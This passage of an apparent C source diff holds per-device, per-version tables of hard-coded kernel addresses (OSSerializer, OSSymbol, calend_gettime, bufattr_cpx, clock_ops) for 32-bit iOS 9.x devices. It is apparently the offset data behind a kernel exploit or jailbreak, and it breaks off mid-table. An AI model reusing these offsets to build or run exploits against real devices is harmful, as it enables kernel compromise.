iPad26_iOS932); + determineTarget("iPad2,6", "9.3.3", iPad26_iOS933); + determineTarget("iPad2,6", "9.3.4", iPad26_iOS934); + determineTarget("iPad2,7", "9.1", iPad27_iOS910); + determineTarget("iPad2,7", "9.2", iPad27_iOS920); + determineTarget("iPad2,7", "9.2.1", iPad27_iOS921); + determineTarget("iPad2,7", "9.3", iPad27_iOS930); + determineTarget("iPad2,7", "9.3.1", iPad27_iOS931); + determineTarget("iPad2,7", "9.3.2", iPad27_iOS932); + determineTarget("iPad2,7", "9.3.3", iPad27_iOS933); + determineTarget("iPad2,7", "9.3.4", iPad27_iOS934); + determineTarget("iPad3,1", "9.1", iPad31_iOS910); + determineTarget("iPad3,1", "9.2", iPad31_iOS920); + determineTarget("iPad3,1", "9.2.1", iPad31_iOS921); + determineTarget("iPad3,1", "9.3.0", iPad31_iOS930); + determineTarget("iPad3,1", "9.3.1", iPad31_iOS931); + determineTarget("iPad3,1", "9.3.2", iPad31_iOS932); + determineTarget("iPad3,1", "9.3.3", iPad31_iOS933); + determineTarget("iPad3,1", "9.3.4", iPad31_iOS934); + determineTarget("iPad3,2", "9.1", iPad32_iOS910); + determineTarget("iPad3,2", "9.2", iPad32_iOS920); + determineTarget("iPad3,2", "9.2.1", iPad32_iOS921); + determineTarget("iPad3,2", "9.3.0", iPad32_iOS930); + determineTarget("iPad3,2", "9.3.1", iPad32_iOS931); + determineTarget("iPad3,2", "9.3.2", iPad32_iOS932); + determineTarget("iPad3,2", "9.3.3", iPad32_iOS933); + determineTarget("iPad3,2", "9.3.4", iPad32_iOS934); + determineTarget("iPad3,3", "9.0.2", iPad33_iOS902); + determineTarget("iPad3,3", "9.1", iPad33_iOS910); + determineTarget("iPad3,3", "9.2", iPad33_iOS920); + determineTarget("iPad3,3", "9.2.1", iPad33_iOS921); + determineTarget("iPad3,3", "9.3", iPad33_iOS930); + determineTarget("iPad3,3", "9.3.1", iPad33_iOS931); + determineTarget("iPad3,3", "9.3.2", iPad33_iOS932); + determineTarget("iPad3,3", "9.3.3", iPad33_iOS933); + determineTarget("iPad3,3", "9.3.4", iPad33_iOS934); + determineTarget("iPad3,4", "9.1", iPad34_iOS910); + determineTarget("iPad3,4", "9.2", iPad34_iOS920); + determineTarget("iPad3,4", "9.2.1", iPad34_iOS921); + determineTarget("iPad3,4", "9.3", iPad34_iOS930); + determineTarget("iPad3,4", "9.3.1", iPad34_iOS931); + determineTarget("iPad3,4", "9.3.2", iPad34_iOS932); + determineTarget("iPad3,4", "9.3.3", iPad34_iOS933); + determineTarget("iPad3,4", "9.3.4", iPad34_iOS934); + determineTarget("iPad3,5", "9.1", iPad35_iOS910); + determineTarget("iPad3,5", "9.2", iPad35_iOS920); + determineTarget("iPad3,5", "9.2.1", iPad35_iOS921); + determineTarget("iPad3,5", "9.3", iPad35_iOS930); + determineTarget("iPad3,5", "9.3.1", iPad35_iOS931); + determineTarget("iPad3,5", "9.3.2", iPad35_iOS932); + determineTarget("iPad3,5", "9.3.3", iPad35_iOS933); + determineTarget("iPad3,5", "9.3.4", iPad35_iOS934); + determineTarget("iPad3,6", "9.1", iPad36_iOS910); + determineTarget("iPad3,6", "9.2", iPad36_iOS920); + determineTarget("iPad3,6", "9.2.1", iPad36_iOS921); + determineTarget("iPad3,6", "9.3", iPad36_iOS930); + determineTarget("iPad3,6", "9.3.1", iPad36_iOS931); + determineTarget("iPad3,6", "9.3.2", iPad36_iOS932); + determineTarget("iPad3,6", "9.3.3", iPad36_iOS933); + determineTarget("iPad3,6", "9.3.4", iPad36_iOS934); + determineTarget("iPod5,1", "9.1", iPod51_iOS910); + determineTarget("iPod5,1", "9.2", iPod51_iOS920); + determineTarget("iPod5,1", "9.2.1", iPod51_iOS921); + determineTarget("iPod5,1", "9.3", iPod51_iOS930); + determineTarget("iPod5,1", "9.3.1", iPod51_iOS931); + determineTarget("iPod5,1", "9.3.2", iPod51_iOS932); + determineTarget("iPod5,1", "9.3.3", iPod51_iOS933); + determineTarget("iPod5,1", "9.3.4", iPod51_iOS934); + return 0; +} + +static inline unsigned int find_OSSerializer_serialize(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x317de4; + case iPhone41_iOS910: return 0x319450; + case iPhone41_iOS920: return 0x3106fc; + case iPhone41_iOS921: return 0x3107fc; + case iPhone41_iOS930: return 0x31812c; + case iPhone41_iOS931: return 0x31812c; + case iPhone41_iOS932: return 0x318264; + case iPhone41_iOS933: return 0x318388; + case iPhone41_iOS934: return 0x318388; + case iPhone51_iOS910: return 0x31fd1c; + case iPhone51_iOS920: return 0x317768; + case iPhone51_iOS921: return 0x317868; + case iPhone51_iOS930: return 0x31ef50; + case iPhone51_iOS931: return 0x31ef50; + case iPhone51_iOS932: return 0x302e3c; + case iPhone51_iOS933: return 0x31f13c; + case iPhone51_iOS934: return 0x31f13c; + case iPhone52_iOS902: return 0x31e7bc; + case iPhone52_iOS910: return 0x31fd1c; + case iPhone52_iOS920: return 0x317768; + case iPhone52_iOS921: return 0x317868; + case iPhone52_iOS930: return 0x31ef50; + case iPhone52_iOS931: return 0x31ef50; + case iPhone52_iOS932: return 0x31ef58; + case iPhone52_iOS933: return 0x31f13c; + case iPhone52_iOS934: return 0x31f13c; + case iPhone53_iOS910: return 0x31fd1c; + case iPhone53_iOS920: return 0x317768; + case iPhone53_iOS921: return 0x317868; + case iPhone53_iOS930: return 0x31ef50; + case iPhone53_iOS931: return 0x31ef50; + case iPhone53_iOS932: return 0x31ef58; + case iPhone53_iOS933: return 0x31f13c; + case iPhone53_iOS934: return 0x31f13c; + case iPhone54_iOS910: return 0x31fd1c; + case iPhone54_iOS920: return 0x317768; + case iPhone54_iOS921: return 0x317868; + case iPhone54_iOS930: return 0x31ef50; + case iPhone54_iOS931: return 0x31ef50; + case iPhone54_iOS932: return 0x31ed7c; + case iPhone54_iOS933: return 0x31f13c; + case iPhone54_iOS934: return 0x31f13c; + case iPad21_iOS910: return 0x319450; + case iPad21_iOS920: return 0x3106fc; + case iPad21_iOS921: return 0x3107fc; + case iPad21_iOS930: return 0x31812c; + case iPad21_iOS931: return 0x31812c; + case iPad21_iOS932: return 0x318264; + case iPad21_iOS933: return 0x318388; + case iPad21_iOS934: return 0x318388; + case iPad22_iOS910: return 0x319450; + case iPad22_iOS920: return 0x3106fc; + case iPad22_iOS921: return 0x3107fc; + case iPad22_iOS930: return 0x31812c; + case iPad22_iOS931: return 0x31812c; + case iPad22_iOS932: return 0x318264; + case iPad22_iOS933: return 0x318388; + case iPad22_iOS934: return 0x318388; + case iPad23_iOS910: return 0x319450; + case iPad23_iOS920: return 0x3106fc; + case iPad23_iOS921: return 0x3107fc; + case iPad23_iOS930: return 0x31812c; + case iPad23_iOS931: return 0x31812c; + case iPad23_iOS932: return 0x318264; + case iPad23_iOS933: return 0x318388; + case iPad23_iOS934: return 0x318388; + case iPad24_iOS910: return 0x319450; + case iPad24_iOS920: return 0x3106fc; + case iPad24_iOS921: return 0x3107fc; + case iPad24_iOS930: return 0x31812c; + case iPad24_iOS931: return 0x31812c; + case iPad24_iOS932: return 0x318264; + case iPad24_iOS933: return 0x318388; + case iPad24_iOS934: return 0x318388; + case iPad25_iOS902: return 0x317de4; + case iPad31_iOS910: return 0x319450; + case iPad31_iOS920: return 0x3106fc; + case iPad31_iOS921: return 0x3107fc; + case iPad31_iOS930: return 0x31812c; + case iPad31_iOS931: return 0x31812c; + case iPad31_iOS932: return 0x318264; + case iPad31_iOS933: return 0x318388; + case iPad31_iOS934: return 0x318388; + case iPad32_iOS910: return 0x319450; + case iPad32_iOS920: return 0x3106fc; + case iPad32_iOS921: return 0x3107fc; + case iPad32_iOS930: return 0x31812c; + case iPad32_iOS931: return 0x31812c; + case iPad32_iOS932: return 0x318264; + case iPad32_iOS933: return 0x318388; + case iPad32_iOS934: return 0x318388; + case iPad33_iOS902: return 0x317de4; + case iPad33_iOS910: return 0x319450; + case iPad33_iOS920: return 0x3106fc; + case iPad33_iOS921: return 0x3107fc; + case iPad33_iOS930: return 0x31812c; + case iPad33_iOS931: return 0x31812c; + case iPad33_iOS932: return 0x318264; + case iPad33_iOS933: return 0x318388; + case iPad33_iOS934: return 0x318388; + case iPad34_iOS910: return 0x31fd1c; + case iPad34_iOS920: return 0x317768; + case iPad34_iOS921: return 0x317868; + case iPad34_iOS930: return 0x31ef50; + case iPad34_iOS931: return 0x31ef50; + case iPad34_iOS932: return 0x31ef58; + case iPad34_iOS933: return 0x31f13c; + case iPad34_iOS934: return 0x31f13c; + case iPad35_iOS910: return 0x31fd1c; + case iPad35_iOS920: return 0x317768; + case iPad35_iOS921: return 0x317868; + case iPad35_iOS930: return 0x31ef50; + case iPad35_iOS931: return 0x31ef50; + case iPad35_iOS932: return 0x31ef58; + case iPad35_iOS933: return 0x31f13c; + case iPad35_iOS934: return 0x31f13c; + case iPad36_iOS910: return 0x31fd1c; + case iPad36_iOS920: return 0x317768; + case iPad36_iOS921: return 0x317868; + case iPad36_iOS930: return 0x31ef50; + case iPad36_iOS931: return 0x31ef50; + case iPad36_iOS932: return 0x31ef58; + case iPad36_iOS933: return 0x31f13c; + case iPad36_iOS934: return 0x31f13c; + case iPod51_iOS910: return 0x319450; + case iPod51_iOS920: return 0x3106fc; + case iPod51_iOS921: return 0x3107fc; + case iPod51_iOS930: return 0x31812c; + case iPod51_iOS931: return 0x31812c; + case iPod51_iOS932: return 0x318264; + case iPod51_iOS933: return 0x318388; + case iPod51_iOS934: return 0x318388; + default: return 0; + } +} + +static inline unsigned int find_OSSymbol_getMetaClass(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x31a5d0; + case iPhone41_iOS910: return 0x31bc3c; + case iPhone41_iOS920: return 0x312e18; + case iPhone41_iOS921: return 0x312f18; + case iPhone41_iOS930: return 0x31a934; + case iPhone41_iOS931: return 0x31a934; + case iPhone41_iOS932: return 0x31aa6c; + case iPhone41_iOS933: return 0x31ab90; + case iPhone41_iOS934: return 0x31ab90; + case iPhone51_iOS910: return 0x322460; + case iPhone51_iOS920: return 0x319ea0; + case iPhone51_iOS921: return 0x319fa0; + case iPhone51_iOS930: return 0x321810; + case iPhone51_iOS931: return 0x321810; + case iPhone51_iOS932: return 0x321818; + case iPhone51_iOS933: return 0x3219fc; + case iPhone51_iOS934: return 0x3219fc; + case iPhone52_iOS902: return 0x320f00; + case iPhone52_iOS910: return 0x322460; + case iPhone52_iOS920: return 0x319ea0; + case iPhone52_iOS921: return 0x319fa0; + case iPhone52_iOS930: return 0x321810; + case iPhone52_iOS931: return 0x321810; + case iPhone52_iOS932: return 0x321818; + case iPhone52_iOS933: return 0x3219fc; + case iPhone52_iOS934: return 0x3219fc; + case iPhone53_iOS910: return 0x322460; + case iPhone53_iOS920: return 0x319ea0; + case iPhone53_iOS921: return 0x319fa0; + case iPhone53_iOS930: return 0x321810; + case iPhone53_iOS931: return 0x321810; + case iPhone53_iOS932: return 0x321818; + case iPhone53_iOS933: return 0x3219fc; + case iPhone53_iOS934: return 0x3219fc; + case iPhone54_iOS910: return 0x322460; + case iPhone54_iOS920: return 0x319ea0; + case iPhone54_iOS921: return 0x319fa0; + case iPhone54_iOS930: return 0x321810; + case iPhone54_iOS931: return 0x321810; + case iPhone54_iOS932: return 0x321818; + case iPhone54_iOS933: return 0x3219fc; + case iPhone54_iOS934: return 0x3219fc; + case iPad21_iOS910: return 0x31bc3c; + case iPad21_iOS920: return 0x312e18; + case iPad21_iOS921: return 0x312f18; + case iPad21_iOS930: return 0x31a934; + case iPad21_iOS931: return 0x31a934; + case iPad21_iOS932: return 0x31aa6c; + case iPad21_iOS933: return 0x31ab90; + case iPad21_iOS934: return 0x31ab90; + case iPad22_iOS910: return 0x31bc3c; + case iPad22_iOS920: return 0x312e18; + case iPad22_iOS921: return 0x312f18; + case iPad22_iOS930: return 0x31a934; + case iPad22_iOS931: return 0x31a934; + case iPad22_iOS932: return 0x31aa6c; + case iPad22_iOS933: return 0x31ab90; + case iPad22_iOS934: return 0x31ab90; + case iPad23_iOS910: return 0x31bc3c; + case iPad23_iOS920: return 0x312e18; + case iPad23_iOS921: return 0x312f18; + case iPad23_iOS930: return 0x31a934; + case iPad23_iOS931: return 0x31a934; + case iPad23_iOS932: return 0x31aa6c; + case iPad23_iOS933: return 0x31ab90; + case iPad23_iOS934: return 0x31ab90; + case iPad24_iOS910: return 0x31bc3c; + case iPad24_iOS920: return 0x312e18; + case iPad24_iOS921: return 0x312f18; + case iPad24_iOS930: return 0x31a934; + case iPad24_iOS931: return 0x31a934; + case iPad24_iOS932: return 0x31aa6c; + case iPad24_iOS933: return 0x31ab90; + case iPad24_iOS934: return 0x31ab90; + case iPad25_iOS902: return 0x31a5d0; + case iPad31_iOS910: return 0x31bc3c; + case iPad31_iOS920: return 0x312e18; + case iPad31_iOS921: return 0x312f18; + case iPad31_iOS930: return 0x31a934; + case iPad31_iOS931: return 0x31a934; + case iPad31_iOS932: return 0x31aa6c; + case iPad31_iOS933: return 0x31ab90; + case iPad31_iOS934: return 0x31ab90; + case iPad32_iOS910: return 0x31bc3c; + case iPad32_iOS920: return 0x312e18; + case iPad32_iOS921: return 0x312f18; + case iPad32_iOS930: return 0x31a934; + case iPad32_iOS931: return 0x31a934; + case iPad32_iOS932: return 0x31aa6c; + case iPad32_iOS933: return 0x31ab90; + case iPad32_iOS934: return 0x31ab90; + case iPad33_iOS902: return 0x31a5d0; + case iPad33_iOS910: return 0x31bc3c; + case iPad33_iOS920: return 0x312e18; + case iPad33_iOS921: return 0x312f18; + case iPad33_iOS930: return 0x31a934; + case iPad33_iOS931: return 0x31a934; + case iPad33_iOS932: return 0x31aa6c; + case iPad33_iOS933: return 0x31ab90; + case iPad33_iOS934: return 0x31ab90; + case iPad34_iOS910: return 0x322460; + case iPad34_iOS920: return 0x319ea0; + case iPad34_iOS921: return 0x319fa0; + case iPad34_iOS930: return 0x321810; + case iPad34_iOS931: return 0x321810; + case iPad34_iOS932: return 0x321818; + case iPad34_iOS933: return 0x3219fc; + case iPad34_iOS934: return 0x3219fc; + case iPad35_iOS910: return 0x322460; + case iPad35_iOS920: return 0x319ea0; + case iPad35_iOS921: return 0x319fa0; + case iPad35_iOS930: return 0x321810; + case iPad35_iOS931: return 0x321810; + case iPad35_iOS932: return 0x321818; + case iPad35_iOS933: return 0x3219fc; + case iPad35_iOS934: return 0x3219fc; + case iPad36_iOS910: return 0x322460; + case iPad36_iOS920: return 0x319ea0; + case iPad36_iOS921: return 0x319fa0; + case iPad36_iOS930: return 0x321810; + case iPad36_iOS931: return 0x321810; + case iPad36_iOS932: return 0x321818; + case iPad36_iOS933: return 0x3219fc; + case iPad36_iOS934: return 0x3219fc; + case iPod51_iOS910: return 0x31bc3c; + case iPod51_iOS920: return 0x312e18; + case iPod51_iOS921: return 0x312f18; + case iPod51_iOS930: return 0x31a934; + case iPod51_iOS931: return 0x31a934; + case iPod51_iOS932: return 0x31aa6c; + case iPod51_iOS933: return 0x31ab90; + case iPod51_iOS934: return 0x31ab90; + default: return 0; + } +} + +static inline unsigned int find_calend_gettime(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x1daec; + case iPhone41_iOS910: return 0x1db34; + case iPhone41_iOS920: return 0x1de84; + case iPhone41_iOS921: return 0x1de60; + case iPhone41_iOS930: return 0x1e170; + case iPhone41_iOS931: return 0x1e170; + case iPhone41_iOS932: return 0x1e170; + case iPhone41_iOS933: return 0x1e200; + case iPhone41_iOS934: return 0x1e200; + case iPhone51_iOS910: return 0x1e76c; + case iPhone51_iOS920: return 0x1ebac; + case iPhone51_iOS921: return 0x1eb88; + case iPhone51_iOS930: return 0x1ee6c; + case iPhone51_iOS931: return 0x1ee6c; + case iPhone51_iOS932: return 0x1ee6c; + case iPhone51_iOS933: return 0x1eeac; + case iPhone51_iOS934: return 0x1eeac; + case iPhone52_iOS902: return 0x1e718; + case iPhone52_iOS910: return 0x1e76c; + case iPhone52_iOS920: return 0x1ebac; + case iPhone52_iOS921: return 0x1eb88; + case iPhone52_iOS930: return 0x1ee6c; + case iPhone52_iOS931: return 0x1ee6c; + case iPhone52_iOS932: return 0x1ee6c; + case iPhone52_iOS933: return 0x1eeac; + case iPhone52_iOS934: return 0x1eeac; + case iPhone53_iOS910: return 0x1e76c; + case iPhone53_iOS920: return 0x1ebac; + case iPhone53_iOS921: return 0x1eb88; + case iPhone53_iOS930: return 0x1ee6c; + case iPhone53_iOS931: return 0x1ee6c; + case iPhone53_iOS932: return 0x1ee6c; + case iPhone53_iOS933: return 0x1eeac; + case iPhone53_iOS934: return 0x1eeac; + case iPhone54_iOS910: return 0x1e76c; + case iPhone54_iOS920: return 0x1ebac; + case iPhone54_iOS921: return 0x1eb88; + case iPhone54_iOS930: return 0x1ee6c; + case iPhone54_iOS931: return 0x1ee6c; + case iPhone54_iOS932: return 0x1ee6c; + case iPhone54_iOS933: return 0x1eeac; + case iPhone54_iOS934: return 0x1eeac; + case iPad21_iOS910: return 0x1db34; + case iPad21_iOS920: return 0x1de84; + case iPad21_iOS921: return 0x1de60; + case iPad21_iOS930: return 0x1e170; + case iPad21_iOS931: return 0x1e170; + case iPad21_iOS932: return 0x1e170; + case iPad21_iOS933: return 0x1e200; + case iPad21_iOS934: return 0x1e200; + case iPad22_iOS910: return 0x1db34; + case iPad22_iOS920: return 0x1de84; + case iPad22_iOS921: return 0x1de60; + case iPad22_iOS930: return 0x1e170; + case iPad22_iOS931: return 0x1e170; + case iPad22_iOS932: return 0x1e170; + case iPad22_iOS933: return 0x1e200; + case iPad22_iOS934: return 0x1e200; + case iPad23_iOS910: return 0x1db34; + case iPad23_iOS920: return 0x1de84; + case iPad23_iOS921: return 0x1de60; + case iPad23_iOS930: return 0x1e170; + case iPad23_iOS931: return 0x1e170; + case iPad23_iOS932: return 0x1e170; + case iPad23_iOS933: return 0x1e200; + case iPad23_iOS934: return 0x1e200; + case iPad24_iOS910: return 0x1db34; + case iPad24_iOS920: return 0x1de84; + case iPad24_iOS921: return 0x1de60; + case iPad24_iOS930: return 0x1e170; + case iPad24_iOS931: return 0x1e170; + case iPad24_iOS932: return 0x1e170; + case iPad24_iOS933: return 0x1e200; + case iPad24_iOS934: return 0x1e200; + case iPad25_iOS902: return 0x1daec; + case iPad31_iOS910: return 0x1db34; + case iPad31_iOS920: return 0x1de84; + case iPad31_iOS921: return 0x1de60; + case iPad31_iOS930: return 0x1e170; + case iPad31_iOS931: return 0x1e170; + case iPad31_iOS932: return 0x1e170; + case iPad31_iOS933: return 0x1e200; + case iPad31_iOS934: return 0x1e200; + case iPad32_iOS910: return 0x1db34; + case iPad32_iOS920: return 0x1de84; + case iPad32_iOS921: return 0x1de60; + case iPad32_iOS930: return 0x1e170; + case iPad32_iOS931: return 0x1e170; + case iPad32_iOS932: return 0x1e170; + case iPad32_iOS933: return 0x1e200; + case iPad32_iOS934: return 0x1e200; + case iPad33_iOS902: return 0x1daec; + case iPad33_iOS910: return 0x1db34; + case iPad33_iOS920: return 0x1de84; + case iPad33_iOS921: return 0x1de60; + case iPad33_iOS930: return 0x1e170; + case iPad33_iOS931: return 0x1e170; + case iPad33_iOS932: return 0x1e170; + case iPad33_iOS933: return 0x1e200; + case iPad33_iOS934: return 0x1e200; + case iPad34_iOS910: return 0x1e76c; + case iPad34_iOS920: return 0x1ebac; + case iPad34_iOS921: return 0x1eb88; + case iPad34_iOS930: return 0x1ee6c; + case iPad34_iOS931: return 0x1ee6c; + case iPad34_iOS932: return 0x1ee6c; + case iPad34_iOS933: return 0x1eeac; + case iPad34_iOS934: return 0x1eeac; + case iPad35_iOS910: return 0x1e76c; + case iPad35_iOS920: return 0x1ebac; + case iPad35_iOS921: return 0x1eb88; + case iPad35_iOS930: return 0x1ee6c; + case iPad35_iOS931: return 0x1ee6c; + case iPad35_iOS932: return 0x1ee6c; + case iPad35_iOS933: return 0x1eeac; + case iPad35_iOS934: return 0x1eeac; + case iPad36_iOS910: return 0x1e76c; + case iPad36_iOS920: return 0x1ebac; + case iPad36_iOS921: return 0x1eb88; + case iPad36_iOS930: return 0x1ee6c; + case iPad36_iOS931: return 0x1ee6c; + case iPad36_iOS932: return 0x1ee6c; + case iPad36_iOS933: return 0x1eeac; + case iPad36_iOS934: return 0x1eeac; + case iPod51_iOS910: return 0x1db34; + case iPod51_iOS920: return 0x1de84; + case iPod51_iOS921: return 0x1de60; + case iPod51_iOS930: return 0x1e170; + case iPod51_iOS931: return 0x1e170; + case iPod51_iOS932: return 0x1e170; + case iPod51_iOS933: return 0x1e200; + case iPod51_iOS934: return 0x1e200; + default: return 0; + } +} + +static inline unsigned int find_bufattr_cpx(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0xd97d0; + case iPhone41_iOS910: return 0xd97d0; + case iPhone41_iOS920: return 0xd8750; + case iPhone41_iOS921: return 0xd8750; + case iPhone41_iOS930: return 0xd9848; + case iPhone41_iOS931: return 0xd9848; + case iPhone41_iOS932: return 0xd9848; + case iPhone41_iOS933: return 0xd9838; + case iPhone41_iOS934: return 0xd9838; + case iPhone51_iOS910: return 0xde9fc; + case iPhone51_iOS920: return 0xdd9dc; + case iPhone51_iOS921: return 0xdd9dc; + case iPhone51_iOS930: return 0xdea48; + case iPhone51_iOS931: return 0xdea48; + case iPhone51_iOS932: return 0xdea48; + case iPhone51_iOS933: return 0xdea48; + case iPhone51_iOS934: return 0xdea48; + case iPhone52_iOS902: return 0xde9fc; + case iPhone52_iOS910: return 0xde9fc; + case iPhone52_iOS920: return 0xdd9dc; + case iPhone52_iOS921: return 0xdd9dc; + case iPhone52_iOS930: return 0xdea48; + case iPhone52_iOS931: return 0xdea48; + case iPhone52_iOS932: return 0xdea48; + case iPhone52_iOS933: return 0xdea48; + case iPhone52_iOS934: return 0xdea48; + case iPhone53_iOS910: return 0xde9fc; + case iPhone53_iOS920: return 0xdd9dc; + case iPhone53_iOS921: return 0xdd9dc; + case iPhone53_iOS930: return 0xdea48; + case iPhone53_iOS931: return 0xdea48; + case iPhone53_iOS932: return 0xdea48; + case iPhone53_iOS933: return 0xdea48; + case iPhone53_iOS934: return 0xdea48; + case iPhone54_iOS910: return 0xde9fc; + case iPhone54_iOS920: return 0xdd9dc; + case iPhone54_iOS921: return 0xdd9dc; + case iPhone54_iOS930: return 0xdea48; + case iPhone54_iOS931: return 0xdea48; + case iPhone54_iOS932: return 0xdea48; + case iPhone54_iOS933: return 0xdea48; + case iPhone54_iOS934: return 0xdea48; + case iPad21_iOS910: return 0xd97d0; + case iPad21_iOS920: return 0xd8750; + case iPad21_iOS921: return 0xd8750; + case iPad21_iOS930: return 0xd9848; + case iPad21_iOS931: return 0xd9848; + case iPad21_iOS932: return 0xd9848; + case iPad21_iOS933: return 0xd9838; + case iPad21_iOS934: return 0xd9838; + case iPad22_iOS910: return 0xd97d0; + case iPad22_iOS920: return 0xd8750; + case iPad22_iOS921: return 0xd8750; + case iPad22_iOS930: return 0xd9848; + case iPad22_iOS931: return 0xd9848; + case iPad22_iOS932: return 0xd9848; + case iPad22_iOS933: return 0xd9838; + case iPad22_iOS934: return 0xd9838; + case iPad23_iOS910: return 0xd97d0; + case iPad23_iOS920: return 0xd8750; + case iPad23_iOS921: return 0xd8750; + case iPad23_iOS930: return 0xd9848; + case iPad23_iOS931: return 0xd9848; + case iPad23_iOS932: return 0xd9848; + case iPad23_iOS933: return 0xd9838; + case iPad23_iOS934: return 0xd9838; + case iPad24_iOS910: return 0xd97d0; + case iPad24_iOS920: return 0xd8750; + case iPad24_iOS921: return 0xd8750; + case iPad24_iOS930: return 0xd9848; + case iPad24_iOS932: return 0xd9848; + case iPad24_iOS933: return 0xd9838; + case iPad24_iOS934: return 0xd9838; + case iPad25_iOS902: return 0xd97d0; + case iPad31_iOS910: return 0xd97d0; + case iPad31_iOS920: return 0xd8750; + case iPad31_iOS921: return 0xd8750; + case iPad31_iOS930: return 0xd9848; + case iPad31_iOS931: return 0xd9848; + case iPad31_iOS932: return 0xd9848; + case iPad31_iOS933: return 0xd9838; + case iPad31_iOS934: return 0xd9838; + case iPad32_iOS910: return 0xd97d0; + case iPad32_iOS920: return 0xd8750; + case iPad32_iOS921: return 0xd8750; + case iPad32_iOS930: return 0xd9848; + case iPad32_iOS931: return 0xd9848; + case iPad32_iOS932: return 0xd9848; + case iPad32_iOS933: return 0xd9838; + case iPad32_iOS934: return 0xd9838; + case iPad33_iOS902: return 0xd97d0; + case iPad33_iOS910: return 0xd97d0; + case iPad33_iOS920: return 0xd8750; + case iPad33_iOS921: return 0xd8750; + case iPad33_iOS930: return 0xd9848; + case iPad33_iOS931: return 0xd9848; + case iPad33_iOS932: return 0xd9848; + case iPad33_iOS933: return 0xd9838; + case iPad33_iOS934: return 0xd9838; + case iPad34_iOS910: return 0xde9fc; + case iPad34_iOS920: return 0xdd9dc; + case iPad34_iOS921: return 0xdd9dc; + case iPad34_iOS930: return 0xdea48; + case iPad34_iOS931: return 0xdea48; + case iPad34_iOS932: return 0xdea48; + case iPad34_iOS933: return 0xdea48; + case iPad34_iOS934: return 0xdea48; + case iPad35_iOS910: return 0xde9fc; + case iPad35_iOS920: return 0xdd9dc; + case iPad35_iOS921: return 0xdd9dc; + case iPad35_iOS930: return 0xdea48; + case iPad35_iOS931: return 0xdea48; + case iPad35_iOS932: return 0xdea48; + case iPad35_iOS933: return 0xdea48; + case iPad35_iOS934: return 0xdea48; + case iPad36_iOS910: return 0xde9fc; + case iPad36_iOS920: return 0xdd9dc; + case iPad36_iOS921: return 0xdd9dc; + case iPad36_iOS930: return 0xdea48; + case iPad36_iOS931: return 0xdea48; + case iPad36_iOS932: return 0xdea48; + case iPad36_iOS933: return 0xdea48; + case iPad36_iOS934: return 0xdea48; + case iPod51_iOS910: return 0xd97d0; + case iPod51_iOS920: return 0xd8750; + case iPod51_iOS921: return 0xd8750; + case iPod51_iOS930: return 0xd9848; + case iPod51_iOS931: return 0xd9848; + case iPod51_iOS932: return 0xd9848; + case iPod51_iOS933: return 0xd9838; + case iPod51_iOS934: return 0xd9838; + default: return 0; + } +} + +static inline unsigned int find_clock_ops(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x4043cc; + case iPhone41_iOS910: return 0x4053cc; + case iPhone41_iOS920: return 0x3fc3dc; + case iPhone41_iOS921: return 0x3fc3dc; + case iPhone41_iOS930: return 0x403428; + case iPhone41_iOS931: return 0x403428; + case iPhone41_iOS932: return 0x403428; + case iPhone41_iOS933: return 0x403428; + case iPhone41_iOS934: return 0x403428; + case iPhone51_iOS910: return 0x40c5a0; + case iPhone51_iOS920: return 0x4033dc; + case iPhone51_iOS921: return 0x4033dc; + case iPhone51_iOS930: return 0x403428; + case iPhone51_iOS931: return 0x40b428; + case iPhone51_iOS932: return 0x40b428; + case iPhone51_iOS933: return 0x40b428; + case iPhone51_iOS934: return 0x40b428; + case iPhone52_iOS902: return 0x40a3cc; + case iPhone52_iOS910: return 0x40c5a0; + case iPhone52_iOS920: return 0x4033dc; + case iPhone52_iOS921: return 0x4033dc; + case iPhone52_iOS930: return 0x403428; + case iPhone52_iOS931: return 0x40b428; + case iPhone52_iOS932: return 0x40b428; + case iPhone52_iOS933: return 0x40b428; + case iPhone52_iOS934: return 0x40b428; + case iPhone53_iOS910: return 0x40c5a0; + case iPhone53_iOS920: return 0x4033dc; + case iPhone53_iOS921: return 0x4033dc; + case iPhone53_iOS930: return 0x403428; + case iPhone53_iOS931: return 0x40b428; + case iPhone53_iOS932: return 0x40b428; + case iPhone53_iOS933: return 0x40b428; + case iPhone53_iOS934: return 0x40b428; + case iPhone54_iOS910: return 0x40c5a0; + case iPhone54_iOS920: return 0x4035a0; + case iPhone54_iOS921: return 0x4035a0; + case iPhone54_iOS930: return 0x403428; + case iPhone54_iOS931: return 0x40b428; + case iPhone54_iOS932: return 0x40b428; + case iPhone54_iOS933: return 0x40b428; + case iPhone54_iOS934: return 0x40b428; + case iPad21_iOS910: return 0x4053cc; + case iPad21_iOS920: return 0x3fc3dc; + case iPad21_iOS921: return 0x3fc3dc; + case iPad21_iOS930: return 0x403428; + case iPad21_iOS931: return 0x403428; + case iPad21_iOS932: return 0x403428; + case iPad21_iOS933: return 0x403428; + case iPad21_iOS934: return 0x403428; + case iPad22_iOS910: return 0x4053cc; + case iPad22_iOS920: return 0x3fc3dc; + case iPad22_iOS921: return 0x3fc3dc; + case iPad22_iOS930: return 0x403428; + case iPad22_iOS931: return 0x403428; + case iPad22_iOS932: return 0x403428; + case iPad22_iOS933: return 0x403428; + case iPad22_iOS934: return 0x403428; + case iPad23_iOS910: return 0x4053cc; + case iPad23_iOS920: return 0x3fc3dc; + case iPad23_iOS921: return 0x2fc3dc; + case iPad23_iOS930: return 0x403428; + case iPad23_iOS931: return 0x403428; + case iPad23_iOS932: return 0x403428; + case iPad23_iOS933: return 0x403428; + case iPad23_iOS934: return 0x403428; + case iPad24_iOS910: return 0x4053cc; + case iPad24_iOS920: return 0x3fc3dc; + case iPad24_iOS921: return 0x2fc3dc; + case iPad24_iOS930: return 0x403428; + case iPad24_iOS931: return 0x403428; + case iPad24_iOS932: return 0x403428; + case iPad24_iOS933: return 0x403428; + case iPad24_iOS934: return 0x403428; + case iPad25_iOS902: return 0x4043c0; + case iPad31_iOS910: return 0x4053cc; + case iPad31_iOS920: return 0x3fc3dc; + case iPad31_iOS921: return 0x3fc3dc; + case iPad31_iOS930: return 0x403428; + case iPad31_iOS931: return 0x403428; + case iPad31_iOS932: return 0x403428; + case iPad31_iOS933: return 0x403428; + case iPad31_iOS934: return 0x403428; + case iPad32_iOS910: return 0x4053cc; + case iPad32_iOS920: return 0x3fc3dc; + case iPad32_iOS921: return 0x3fc3dc; + case iPad32_iOS930: return 0x403428; + case 